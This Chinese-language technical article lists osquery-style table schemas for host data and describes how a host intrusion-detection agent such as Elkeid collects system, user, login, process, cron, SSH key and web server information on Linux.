socket BIGINT Socket handle or inode number
path TEXT Path for UNIX domain sockets
net_namespace TEXT The inode number of the network namespace

routes

主机系统的活动路由表

字段 类型 描述
destination TEXT Destination IP address
netmask INTEGER Netmask length
gateway TEXT Route gateway
source TEXT Route source
flags INTEGER Flags to describe route
interface TEXT Route local interface
mtu INTEGER Maximum Transmission Unit for the route
metric INTEGER Cost of route. Lowest is preferred
type TEXT Type of route
hopcount INTEGER Max hops expected

f. ELF信息

elf_dynamic

ELF 动态section信息

字段 类型 描述
tag INTEGER Tag ID
value INTEGER Tag value
class INTEGER Class (32 or 64)
path TEXT Path to ELF file

elf_info

ELF 文件信息

字段 类型 描述
class TEXT Class type, 32 or 64bit
abi TEXT Section type
abi_version INTEGER Section virtual address in memory
type TEXT Offset of section in file
machine INTEGER Machine type
version INTEGER Object file version
entry BIGINT Entry point address
flags INTEGER ELF header flags
path TEXT Path to ELF file

elf_sections

ELF section 信息

字段 类型 描述
name TEXT Section name
type INTEGER Section type
vaddr INTEGER Section virtual address in memory
offset INTEGER Offset of section in file
size INTEGER Size of section
flags TEXT Section attributes
link TEXT Link to other section
align INTEGER Segment alignment
path TEXT Path to ELF file

elf_segments

ELF 段信息

字段 类型 描述
name TEXT Segment type/name
offset INTEGER Segment offset in file
vaddr INTEGER Segment virtual address in memory
psize INTEGER Size of segment in file
msize INTEGER Segment offset in memory
flags TEXT Segment attributes
align INTEGER Segment alignment
path TEXT Path to ELF file

elf_symbols

ELF 符号列表

字段 类型 描述
name TEXT Symbol name
addr INTEGER Symbol address (value)
size INTEGER Size of object
type TEXT Symbol type
binding TEXT Binding type
offset INTEGER Section table index
table TEXT Table name containing symbol
path TEXT Path to ELF file

g. etc配置信息

etc_hosts

行解析的 /etc/hosts

字段 类型 描述
address TEXT IP address mapping
hostnames TEXT Raw hosts mapping
pid_with_namespace INTEGER Pids that contain a namespace

etc_protocols

行解析的 /etc/protocols

字段 类型 描述
name TEXT Protocol name
number INTEGER Protocol number
alias TEXT Protocol alias
comment TEXT Comment with protocol description

etc_services

行解析的 /etc/services

字段 类型 描述
name TEXT Service name
port INTEGER Service port number
protocol TEXT Transport protocol (TCP/UDP)
aliases TEXT Optional space separated list of other names for a service
comment TEXT Optional comment for a service

h. 文件信息

file

交互式文件系统属性和元数据

字段 类型 描述
path TEXT Absolute file path
directory TEXT Directory of file(s)
filename TEXT Name portion of file path
inode BIGINT Filesystem inode number
uid BIGINT Owning user ID
gid BIGINT Owning group ID
mode TEXT Permission bits
device BIGINT Device ID (optional)
size BIGINT Size of file in bytes
block_size INTEGER Block size of filesystem
atime BIGINT Last access time
mtime BIGINT Last modification time
ctime BIGINT Last status change time
btime BIGINT (B)irth or (cr)eate time
hard_links INTEGER Number of hard links
symlink INTEGER 1 if the path is a symlink, otherwise 0
type TEXT File status
attributes TEXT File attrib string. See: https://ss64.com/nt/attrib.html
volume_serial TEXT Volume serial number
file_id TEXT file ID
file_version TEXT File version
product_version TEXT File product version
bsd_flags TEXT The BSD file flags (chflags). Possible values: NODUMP, UF_IMMUTABLE, UF_APPEND, OPAQUE, HIDDEN, ARCHIVED, SF_IMMUTABLE, SF_APPEND
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

hash

文件系统哈希数据

字段 类型 描述
path TEXT Must provide a path or directory
directory TEXT Must provide a path or directory
md5 TEXT MD5 hash of provided filesystem data
sha1 TEXT SHA1 hash of provided filesystem data
sha256 TEXT SHA256 hash of provided filesystem data
ssdeep TEXT ssdeep hash of provided filesystem data
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

extended_attributes

文件的扩展属性(类似于 Windows ADS)

字段 类型 描述
path TEXT Absolute file path
directory TEXT Directory of file(s)
key TEXT Name of the value generated from the extended attribute
value TEXT The parsed information from the attribute
base64 INTEGER 1 if the value is base64 encoded else 0

i. 内存信息

memory_array_mapped_addresses

与物理内存阵列的地址映射相关的数据

字段 类型 描述
handle TEXT Handle, or instance number, associated with the structure
memory_array_handle TEXT Handle of the memory array associated with this structure
starting_address TEXT Physical stating address, in kilobytes, of a range of memory mapped to physical memory array
ending_address TEXT Physical ending address of last kilobyte of a range of memory mapped to physical memory array
partition_width INTEGER Number of memory devices that form a single row of memory for the address partition of this structure

memory_arrays

与操作以形成内存地址的内存设备集合相关联的数据

字段 类型 描述
handle TEXT Handle, or instance number, associated with the array
location TEXT Physical location of the memory array
use TEXT Function for which the array is used
memory_error_correction TEXT Primary hardware error correction or detection method supported
max_capacity INTEGER Maximum capacity of array in gigabytes
memory_error_info_handle TEXT Handle, or instance number, associated with any error that was detected for the array
number_memory_devices INTEGER Number of memory devices on array

memory_device_mapped_addresses

与物理内存设备的地址映射相关的数据

字段 类型 描述
handle TEXT Handle, or instance number, associated with the structure
memory_device_handle TEXT Handle of the memory device structure associated with this structure
memory_array_mapped_address_handle TEXT Handle of the memory array mapped address to which this device range is mapped to
starting_address TEXT Physical stating address, in kilobytes, of a range of memory mapped to physical memory array
ending_address TEXT Physical ending address of last kilobyte of a range of memory mapped to physical memory array
partition_row_position INTEGER Identifies the position of the referenced memory device in a row of the address partition
interleave_position INTEGER The position of the device in a interleave, i.e. 0 indicates non-interleave, 1 indicates 1st interleave, 2 indicates 2nd interleave, etc.
interleave_data_depth INTEGER The max number of consecutive rows from memory device that are accessed in a single interleave transfer; 0 indicates device is non-interleave

memory_devices

从 SMBIOS 检索到的物理内存设备(类型 17)信息

字段 类型 描述
handle TEXT Handle, or instance number, associated with the structure in SMBIOS
array_handle TEXT The memory array that the device is attached to
form_factor TEXT Implementation form factor for this memory device
total_width INTEGER Total width, in bits, of this memory device, including any check or error-correction bits
data_width INTEGER Data width, in bits, of this memory device
size INTEGER Size of memory device in Megabyte
set INTEGER Identifies if memory device is one of a set of devices. A value of 0 indicates no set affiliation.
device_locator TEXT String number of the string that identifies the physically-labeled socket or board position where the memory device is located
bank_locator TEXT String number of the string that identifies the physically-labeled bank where the memory device is located
memory_type TEXT Type of memory used
memory_type_details TEXT Additional details for memory device
max_speed INTEGER Max speed of memory device in megatransfers per second (MT/s)
configured_clock_speed INTEGER Configured speed of memory device in megatransfers per second (MT/s)
manufacturer TEXT Manufacturer ID string
serial_number TEXT Serial number of memory device
asset_tag TEXT Manufacturer specific asset tag of memory device
part_number TEXT Manufacturer specific serial number of memory device
min_voltage INTEGER Minimum operating voltage of device in millivolts
max_voltage INTEGER Maximum operating voltage of device in millivolts
configured_voltage INTEGER Configured operating voltage of device in millivolts

memory_error_info

与物理内存阵列错误相关的数据

字段 类型 描述
handle TEXT Handle, or instance number, associated with the structure
error_type TEXT type of error associated with current error status for array or device
error_granularity TEXT Granularity to which the error can be resolved
error_operation TEXT Memory access operation that caused the error
vendor_syndrome TEXT Vendor specific ECC syndrome or CRC data associated with the erroneous access
memory_array_error_address TEXT 32 bit physical address of the error based on the addressing of the bus to which the memory array is connected
device_error_address TEXT 32 bit physical address of the error relative to the start of the failing memory address, in bytes
error_resolution TEXT Range, in bytes, within which this error can be determined, when an error address is given

memory_info

以字节为单位的主内存信息

字段 类型 描述
memory_total BIGINT Total amount of physical RAM, in bytes
memory_free BIGINT The amount of physical RAM, in bytes, left unused by the system
buffers BIGINT The amount of physical RAM, in bytes, used for file buffers
cached BIGINT The amount of physical RAM, in bytes, used as cache memory
swap_cached BIGINT The amount of swap, in bytes, used as cache memory
active BIGINT The total amount of buffer or page cache memory, in bytes, that is in active use
inactive BIGINT The total amount of buffer or page cache memory, in bytes, that are free and available
swap_total BIGINT The total amount of swap available, in bytes
swap_free BIGINT The total amount of swap free, in bytes

memory_map

操作系统内存区域映射

字段 类型 描述
name TEXT Region name
start TEXT Start address of memory region
end TEXT End address of memory region

shared_memory

操作系统共享内存区域

字段 类型 描述
shmid INTEGER Shared memory segment ID
owner_uid BIGINT User ID of owning process
creator_uid BIGINT User ID of creator process
pid BIGINT Process ID to last use the segment
creator_pid BIGINT Process ID that created the segment
atime BIGINT Attached time
dtime BIGINT Detached time
ctime BIGINT Changed time
permissions TEXT Memory segment permissions
size BIGINT Size in bytes
attached INTEGER Number of attached processes
status TEXT Destination/attach status
locked INTEGER 1 if segment is locked else 0

j. 进程信息

process_envs

每个进程的环境变量键/值表

字段 类型 描述
pid INTEGER Process (or thread) ID
key TEXT Environment variable name
value TEXT Environment variable value

process_memory_map

处理内存映射文件和伪设备/区域

字段 类型 描述
pid INTEGER Process (or thread) ID
start TEXT Virtual start address (hex)
end TEXT Virtual end address (hex)
permissions TEXT r=read, w=write, x=execute, p=private (cow)
offset BIGINT Offset into mapped path
device TEXT MA:MI Major/minor device ID
inode INTEGER Mapped path inode, 0 means uninitialized (BSS)
path TEXT Path to mapped file or mapped type
pseudo INTEGER 1 If path is a pseudo path, else 0

process_namespaces

主机系统上运行的进程的 Linux 名称空间

字段 类型 描述
pid INTEGER Process (or thread) ID
cgroup_namespace TEXT cgroup namespace inode
ipc_namespace TEXT ipc namespace inode
mnt_namespace TEXT mnt namespace inode
net_namespace TEXT net namespace inode
pid_namespace TEXT pid namespace inode
user_namespace TEXT user namespace inode
uts_namespace TEXT uts namespace inode

process_open_files

每个进程的文件描述符

字段 类型 描述
pid BIGINT Process (or thread) ID
fd BIGINT Process-specific file descriptor number
path TEXT Filesystem path of descriptor

process_open_pipes

每个进程的管道和partner进程

字段 类型 描述
pid BIGINT Process ID
fd BIGINT File descriptor
mode TEXT Pipe open mode (r/w)
inode BIGINT Pipe inode number
type TEXT Pipe Type: named vs unnamed/anonymous
partner_pid BIGINT Process ID of partner process sharing a particular pipe
partner_fd BIGINT File descriptor of shared pipe at partner’s end
partner_mode TEXT Mode of shared pipe at partner’s end

process_open_sockets

在系统上打开网络套接字的进程

字段 类型 描述
pid INTEGER Process (or thread) ID
fd BIGINT Socket file descriptor number
socket BIGINT Socket handle or inode number
family INTEGER Network protocol (IPv4, IPv6)
protocol INTEGER Transport protocol (TCP/UDP)
local_address TEXT Socket local address
remote_address TEXT Socket remote address
local_port INTEGER Socket local port
remote_port INTEGER Socket remote port
path TEXT For UNIX sockets (family=AF_UNIX), the domain path
state TEXT TCP socket state
net_namespace TEXT The inode number of the network namespace

processes

主机系统上所有正在运行的进程

字段 类型 描述
pid BIGINT Process (or thread) ID
name TEXT The process path or shorthand argv[0]
path TEXT Path to executed binary
cmdline TEXT Complete argv
state TEXT Process state
cwd TEXT Process current working directory
root TEXT Process virtual root directory
uid BIGINT Unsigned user ID
gid BIGINT Unsigned group ID
euid BIGINT Unsigned effective user ID
egid BIGINT Unsigned effective group ID
suid BIGINT Unsigned saved user ID
sgid BIGINT Unsigned saved group ID
on_disk INTEGER The process path exists yes=1, no=0, unknown=-1
wired_size BIGINT Bytes of unpageable memory used by process
resident_size BIGINT Bytes of private memory used by process
total_size BIGINT Total virtual memory size
user_time BIGINT CPU time in milliseconds spent in user space
system_time BIGINT CPU time in milliseconds spent in kernel space
disk_bytes_read BIGINT Bytes read from disk
disk_bytes_written BIGINT Bytes written to disk
start_time BIGINT Process start time in seconds since Epoch, in case of error -1
parent BIGINT Process parent’s PID
pgroup BIGINT Process group
threads INTEGER Number of threads used by process
nice INTEGER Process nice level (-20 to 20, default 0)
elevated_token INTEGER Process uses elevated token yes=1, no=0
secure_process INTEGER Process is secure (IUM) yes=1, no=0
protection_type TEXT The protection type of the process
virtual_process INTEGER Process is virtual (e.g. System, Registry, vmmem) yes=1, no=0
elapsed_time BIGINT Elapsed time in seconds this process has been running.
handle_count BIGINT Total number of handles that the process has open. This number is the sum of the handles currently opened by each thread in the process.
percent_processor_time BIGINT Returns elapsed time that all of the threads of this process used the processor to execute instructions in 100 nanoseconds ticks.
upid BIGINT A 64bit pid that is never reused. Returns -1 if we couldn’t gather them from the system.
uppid BIGINT The 64bit parent pid that is never reused. Returns -1 if we couldn’t gather them from the system.
cpu_type INTEGER Indicates the specific processor designed for installation.
cpu_subtype INTEGER Indicates the specific processor on which an entry may be used.

k. 安全信息

apparmor_profiles

跟踪活动的 AppArmor 配置文件

字段 类型 描述
path TEXT Unique, aa-status compatible, policy identifier.
name TEXT Policy name.
attach TEXT Which executable(s) a profile will attach to.
mode TEXT How the policy is applied.
sha1 TEXT A unique hash that identifies this policy

iptables

Linux IP包过滤和NAT工具

字段 类型 描述
filter_name TEXT Packet matching filter table name.
chain TEXT Size of module content.
policy TEXT Policy that applies for this rule.
target TEXT Target that applies for this rule.
protocol INTEGER Protocol number identification.
src_port TEXT Protocol source port(s).
dst_port TEXT Protocol destination port(s).
src_ip TEXT Source IP address.
src_mask TEXT Source IP address mask.
iniface TEXT Input interface for the rule.
iniface_mask TEXT Input interface mask for the rule.
dst_ip TEXT Destination IP address.
dst_mask TEXT Destination IP address mask.
outiface TEXT Output interface for the rule.
outiface_mask TEXT Output interface mask for the rule.
match TEXT Matching rule that applies.
packets INTEGER Number of matching packets for this rule.
bytes INTEGER Number of matching bytes for this rule.

secureboot

安全启动 UEFI 设置

字段 类型 描述
secure_boot INTEGER Whether secure boot is enabled
setup_mode INTEGER Whether setup mode is enabled

selinux_settings

跟踪活动的 SELinux 设置

字段 类型 描述
scope TEXT Where the key is located inside the SELinuxFS mount point.
key TEXT Key or class name.
value TEXT Active value

yara

跟踪文件或 PID 的 YARA 匹配

字段 类型 描述
path TEXT The path scanned
matches TEXT List of YARA matches
count INTEGER Number of YARA matches
sig_group TEXT Signature group used
sigfile TEXT Signature file used
sigrule TEXT Signature strings used
strings TEXT Matching strings
tags TEXT Matching tags
sigurl TEXT Signature url

l. 登录信息

authorized_keys

以行分隔的 authorized_keys 表

字段 类型 描述
uid BIGINT The local owner of authorized_keys file
algorithm TEXT algorithm of key
key TEXT parsed authorized keys line
key_file TEXT Path to the authorized_keys file
pid_with_namespace INTEGER Pids that contain a namespace

known_hosts

以行分隔的 known_hosts 表

字段 类型 描述
uid BIGINT The local user that owns the known_hosts file
key TEXT parsed authorized keys line
key_file TEXT Path to known_hosts file

last

系统登录和注销

字段 类型 描述
username TEXT Entry username
tty TEXT Entry terminal
pid INTEGER Process (or thread) ID
type INTEGER Entry type, according to ut_type types (utmp.h)
type_name TEXT Entry type name, according to ut_type types (utmp.h)
time INTEGER Entry timestamp
host TEXT Entry hostname

logged_in_users

在系统上具有活动 shell 的用户

字段 类型 描述
type TEXT Login type
user TEXT User login name
tty TEXT Device name
host TEXT Remote hostname
time BIGINT Time entry was made
pid INTEGER Process (or thread) ID
sid TEXT The user’s unique security identifier
registry_hive TEXT HKEY_USERS registry hive

ssh_configs

已解析的 ssh_configs 表

字段 类型 描述
uid BIGINT The local owner of the ssh_config file
block TEXT The host or match block
option TEXT The option and value
ssh_config_file TEXT Path to the ssh_config file

m. 计划任务/启动项

startup_items

应用程序和二进制文件设置为用户/登录启动项

字段 类型 描述
name TEXT Name of startup item
path TEXT Path of startup item
args TEXT Arguments provided to startup executable
type TEXT Startup Item or Login Item
source TEXT Directory or plist containing startup item
status TEXT Startup status; either enabled or disabled
username TEXT The user associated with the startup item

crontab

来自系统和用户 crontab 的行解析值

字段 类型 描述
event TEXT The job @event name (rare)
minute TEXT The exact minute for the job
hour TEXT The hour of the day for the job
day_of_month TEXT The day of the month for the job
month TEXT The month of the year for the job
day_of_week TEXT The day of the week for the job
command TEXT Raw command string
path TEXT File parsed
pid_with_namespace INTEGER Pids that contain a namespace

n. 系统/内核信息

block_devices

块(缓冲访问)设备文件节点:磁盘、虚拟磁盘和 DMG 容器

字段 类型 描述
name TEXT Block device name
parent TEXT Block device parent name
vendor TEXT Block device vendor string
model TEXT Block device model string identifier
size BIGINT Block device size in blocks
block_size INTEGER Block size in bytes
uuid TEXT Block device Universally Unique Identifier
type TEXT Block device type string
label TEXT Block device label string

cpu_time

显示来自 /proc/stat 文件的有关 cpu 内核在系统不同部分花费的时间的信息

字段 类型 描述
core INTEGER Name of the cpu (core)
user BIGINT Time spent in user mode
nice BIGINT Time spent in user mode with low priority (nice)
system BIGINT Time spent in system mode
idle BIGINT Time spent in the idle task
iowait BIGINT Time spent waiting for I/O to complete
irq BIGINT Time spent servicing interrupts
softirq BIGINT Time spent servicing softirqs
steal BIGINT Time spent in other operating systems when running in a virtualized environment
guest BIGINT Time spent running a virtual CPU for a guest OS under the control of the Linux kernel
guest_nice BIGINT Time spent running a niced guest

cpuid

来自 cpuid ASM 调用的有用 CPU 特性

字段 类型 描述
feature TEXT Present feature flags
value TEXT Bit value or string
output_register TEXT Register used to for feature value
output_bit INTEGER Bit in register value for feature value
input_eax TEXT Value of EAX used

device_file

类似于文件表,但使用 TSK 并允许块地址访问

字段 类型 描述
device TEXT Absolute file path to device node
partition TEXT A partition number
path TEXT A logical path within the device node
filename TEXT Name portion of file path
inode BIGINT Filesystem inode number
uid BIGINT Owning user ID
gid BIGINT Owning group ID
mode TEXT Permission bits
size BIGINT Size of file in bytes
block_size INTEGER Block size of filesystem
atime BIGINT Last access time
mtime BIGINT Last modification time
ctime BIGINT Creation time
hard_links INTEGER Number of hard links
type TEXT File status

device_hash

类似于哈希表,但使用 TSK 并允许块地址访问

字段 类型 描述
device TEXT Absolute file path to device node
partition TEXT A partition number
inode BIGINT Filesystem inode number
md5 TEXT MD5 hash of provided inode data
sha1 TEXT SHA1 hash of provided inode data
sha256 TEXT SHA256 hash of provided inode data

kernel_info

基本active内核信息

字段 类型 描述
version TEXT Kernel version
arguments TEXT Kernel arguments
path TEXT Kernel path
device TEXT Kernel device identifier

kernel_modules

已加载并位于加载搜索路径内的Linux 内核模块

字段 类型 描述
name TEXT Module name
size BIGINT Size of module content
used_by TEXT Module reverse dependencies
status TEXT Kernel module status
address TEXT Kernel module address

load_average

显示有关系统范围的平均负载的信息

字段 类型 描述
period TEXT Period over which the average is calculated.
average TEXT Load average over the specified period.

mounts

系统安装的设备和文件系统(不是特定于进程的)

字段 类型 描述
device TEXT Mounted device
device_alias TEXT Mounted device alias
path TEXT Mounted device path
type TEXT Mounted device type
blocks_size BIGINT Block size in bytes
blocks BIGINT Mounted device used blocks
blocks_free BIGINT Mounted device free blocks
blocks_available BIGINT Mounted device available blocks
inodes BIGINT Mounted device used inodes
inodes_free BIGINT Mounted device free inodes
flags TEXT Mounted device flags

os_version

包含操作系统名称和版本的单行信息

字段 类型 描述
name TEXT Distribution or product name
version TEXT Pretty, suitable for presentation, OS version
major INTEGER Major release version
minor INTEGER Minor release version
patch INTEGER Optional patch release
build TEXT Optional build-specific or variant string
platform TEXT OS Platform or ID
platform_like TEXT Closely related platforms
codename TEXT OS version codename
arch TEXT OS Architecture
install_date BIGINT The install date of the OS.
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

platform_info

有关 EFI/UEFI/ROM 和平台/引导的信息

字段 类型 描述
vendor TEXT Platform code vendor
version TEXT Platform code version
date TEXT Self-reported platform code update date
revision TEXT BIOS major and minor revision
address TEXT Relative address of firmware mapping
size TEXT Size in bytes of firmware
volume_size INTEGER (Optional) size of firmware volume
extra TEXT Platform-specific additional information

system_controls

sysctl 名称、值和设置信息

字段 类型 描述
name TEXT Full sysctl MIB name
oid TEXT Control MIB
subsystem TEXT Subsystem ID, control type
current_value TEXT Value of setting
config_value TEXT The MIB value set in /etc/sysctl.conf
type TEXT Data type
field_name TEXT Specific attribute of opaque type

system_info

用于识别的系统信息

字段 类型 描述
hostname TEXT Network hostname including domain
uuid TEXT Unique ID provided by the system
cpu_type TEXT CPU type
cpu_subtype TEXT CPU subtype
cpu_brand TEXT CPU brand string, contains vendor and model
cpu_physical_cores INTEGER Number of physical CPU cores in to the system
cpu_logical_cores INTEGER Number of logical CPU cores available to the system
cpu_microcode TEXT Microcode version
physical_memory BIGINT Total physical memory in bytes
hardware_vendor TEXT Hardware vendor
hardware_model TEXT Hardware model
hardware_version TEXT Hardware version
hardware_serial TEXT Device serial number
board_vendor TEXT Board vendor
board_model TEXT Board model
board_version TEXT Board version
board_serial TEXT Board serial number
computer_name TEXT Friendly computer name (optional)
local_hostname TEXT Local hostname (optional)

systemd_units

跟踪系统单元

字段 类型 描述
id TEXT Unique unit identifier
description TEXT Unit description
load_state TEXT Reflects whether the unit definition was properly loaded
active_state TEXT The high-level unit activation state, i.e. generalization of SUB
sub_state TEXT The low-level unit activation state, values depend on unit type
following TEXT The name of another unit that this unit follows in state
object_path TEXT The object path for this unit
job_id BIGINT Next queued job id
job_type TEXT Job type
job_path TEXT The object path for the job
fragment_path TEXT The unit file path this unit was read from, if there is any
user TEXT The configured user, if any
source_path TEXT Path to the (possibly generated) unit configuration file

ulimit_info

系统资源使用限制

字段 类型 描述
type TEXT System resource to be limited
soft_limit TEXT Current limit value
hard_limit TEXT Maximum limit value

uptime

跟踪自上次启动以来经过的时间

字段 类型 描述
days INTEGER Days of uptime
hours INTEGER Hours of uptime
minutes INTEGER Minutes of uptime
seconds INTEGER Seconds of uptime
total_seconds BIGINT Total uptime seconds

3. Elkeid数据项

a. 用户态数据

b. 内核态数据

refer: https://github.com/bytedance/Elkeid/blob/main/png/data1.png

0x02 数据采集技术

基础信息

1. 系统版本

1
根据操作系统解析相应/etc/issue、/etc/redhat-release、/etc/gentoo-release文件系统版本信息搜集

2. keneral信息

1
解析/proc/cmdline和/proc/version

3. 用户信息

1
通过/etc/passwd文件搜集用户信息,去除nologin的用户

sudoers信息:解析/etc/sudoers和/etc/sudoers.d/目录下的文件

4. 登录信息

日志文件 说明
/var/log/secure 记录用户登录验证和授权的信息,涉及账号和密码的程序都会记录
/var/log/auth.log 记录系统授权信息,如用户登录和权限机制等
/var/log/btmp 记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
/var/log/wtmp 永久记录所有用户的登录、注销信息,同时记录系统的启动、重启、关机事件,使用last命令来查看
/var/log/utmp 记录当前已经登录的用户信息,用w,who,users等命令来查询

5. 进程信息

1
通过遍历/proc目录下获取所有的进程信息

refer: http://man7.org/linux/man-pages/man5/proc.5.html

6. 环境变量信息

1
2
3
4
5
切换到各个用户,运行以下命令:

- set命令显示当前shell的变量,包括当前用户的变量;
- env命令显示当前用户的变量;
- export命令显示当前导出成用户变量的shell变量

7. 定时任务信息

1
2
3
4
5
6
/etc/crontab		# 文件保存系统计划任务
/var/spool/cron/	# 文件夹保存用户计划任务
/etc/cron.d/ 		# system all
/var/at/tabs/ 		# user mac:lion
/var/spool/cron/ 	# user linux:centos
/var/spool/cron/crontabs/	# user linux:debian

8. authorized信息

1
2
3
遍历所有加目录下的".ssh/authorized_keys",".ssh/authorized_keys2"文件

konw_host文件:遍历所有用户家目录下的.ssh/known_hosts文件

9. 三方组件信息

1
2
3
4
5
三方组件包最常见的就是java的三方组件,

1) 获取方法是遍历webservers三方路径下的jar文件。如果是war文件部署,还需要把war包解压,然后再重复上述步骤遍历.jar文件获取到三方组件的名字和版本号。

2) 另一种获取组件的方式可能是解析web应用的pom.xml文件(并非所有java web应用程序都有),文件里的标签 ``管理着三方组件的信息

10. Web Server信息

1
2
3
通过监控到的所有的进程信息,筛选出命令行运行了nginx|httpd|apache|tomcat|weblogic|jboss|jetty等webserver的信息。

通过遍历/proc/[pid]/cmdline或/proc/[pid]/cwd,用于搜集webserver的版本号以及webserver的web代码路径

11. 系统控制文件

1
2
3
4
5
6
7
8
9
解析系统控制配置文件: /etc/sysct.conf

系统控制文件可能存在路径:
    
/run/sysctl.d/%.conf         
/etc/sysctl.d/%.conf
/usr/local/lib/sysctl.d/%.conf
/usr/lib/sysctl.d/%.conf
/lib/sysctl.d/%.conf

12. 其它信息

  • memory_map: 解析/proc/iomem
  • mounts: 解析/proc/mounts
  • modules: 解析/proc/modules
  • memory_info: 解析/proc/meminfo
  • shared_memory: 通过shmctl函数遍历merory id从1遍历到最大
  • uptime: 通过sysctl函数获取boottime

0xFF Reference